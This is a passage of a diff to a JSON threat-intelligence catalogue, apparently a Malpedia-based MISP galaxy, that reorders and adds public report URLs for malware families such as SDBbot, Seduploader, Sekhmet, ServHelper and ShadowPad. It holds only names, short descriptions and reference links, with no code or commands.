"https://vblocalhost.com/uploads/VB2020-Jung.pdf", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://github.com/Tera0017/SDBbot-Unpacker", - "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://github.com/Tera0017/SDBbot-Unpacker", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf", - "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://vblocalhost.com/uploads/VB2020-Jung.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -43203,10 +45248,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", - "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/" ], "synonyms": [ @@ -43236,14 +45281,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat", + "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", + "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", "https://cyberflorida.org/2022/11/arechclient2/", "https://tampabay.tech/2022/11/30/arechclient2/", - "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/", "https://medium.com/@gi7w0rm/a-long-way-to-sectoprat-eb2f0aad6ec8", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html", - "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", "https://www.gdatasoftware.com/blog/2021/02/36633-new-version-adds-encrypted-communication", + "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/", "https://cdn-production.blackpointcyber.com/wp-content/uploads/2022/11/01161208/Blackpoint-Cyber-Ratting-out-Arechclient2-Whitepaper.pdf" ], "synonyms": [ @@ -43276,14 +45322,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", - "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/" ], "synonyms": [ @@ -43300,26 +45346,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", - "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" ], "synonyms": [ "GAMEFISH", @@ -43347,20 +45393,20 @@ "value": "seinup" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Sekhmet is ransomware. This malicious program operates by encrypting data and demanding ransom payments for decryption. During the encryption process, all affected files are appended with an extension, consisting of random characters (e.g. \".HrUSsw\", \".WNgh\", \".NdWfEr\", etc.).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html" + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [], "type": [] @@ -43373,8 +45419,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake", - "https://twitter.com/8th_grey_owl/status/1481433481485844483", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://twitter.com/8th_grey_owl/status/1481433481485844483" ], "synonyms": [], "type": [] @@ -43455,30 +45501,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", - "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", - "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", - "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", - "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", "https://insights.oem.avira.com/ta505-apt-group-targets-americas/", "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", - "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", - "https://intel471.com/blog/a-brief-history-of-ta505", - "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56" + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", + "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", + "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -43522,22 +45568,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", - "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + "https://www.youtube.com/watch?v=T5wPwvLrBYU", + "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", + "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", + "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://securelist.com/operation-shadowhammer/89992/", + "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", "https://mauronz.github.io/shadowhammer-backdoor", "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", - "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://www.youtube.com/watch?v=T5wPwvLrBYU", - "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", - "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", - "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/" + "https://securelist.com/operation-shadowhammer/89992/" ], "synonyms": [ "DAYJOB" @@ -43552,60 +45598,63 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://attack.mitre.org/groups/G0096", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.secureworks.com/research/shadowpad-malware-analysis", "https://community.riskiq.com/article/d8b749f2", - "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://www.youtube.com/watch?v=55kaaMGBARM", - "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", - "https://www.ic3.gov/Media/News/2021/211220.pdf", - "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", - "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", - "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/", - "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", - "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf", - "https://www.youtube.com/watch?v=r1zAVX_HnJg", - "https://www.youtube.com/watch?v=IRh6R8o1Q7U", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", - "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", - "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.youtube.com/watch?v=_fstHQSK-kk", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", - "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", - "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "https://www.ic3.gov/Media/News/2021/211220.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", + "https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html", "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf", + "https://www.secureworks.com/research/shadowpad-malware-analysis", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf", + "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2", + "https://www.youtube.com/watch?v=r1zAVX_HnJg", + "https://www.welivesecurity.com/2022/09/06/worok-big-picture/", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", + "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", + "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html", + "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://www.welivesecurity.com/2022/09/06/worok-big-picture/" + "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + "https://attack.mitre.org/groups/G0096", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", + "https://www.youtube.com/watch?v=IRh6R8o1Q7U", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.youtube.com/watch?v=55kaaMGBARM", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor", + "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", + "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", + "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html", + "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "POISONPLUG.SHADOW", @@ -43621,8 +45670,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/" ], "synonyms": [], "type": [] @@ -43663,8 +45712,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shark", - "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/", - "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf" + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", + "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/" ], "synonyms": [], "type": [] @@ -43715,7 +45764,7 @@ "value": "SharpMapExec" }, { - "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of 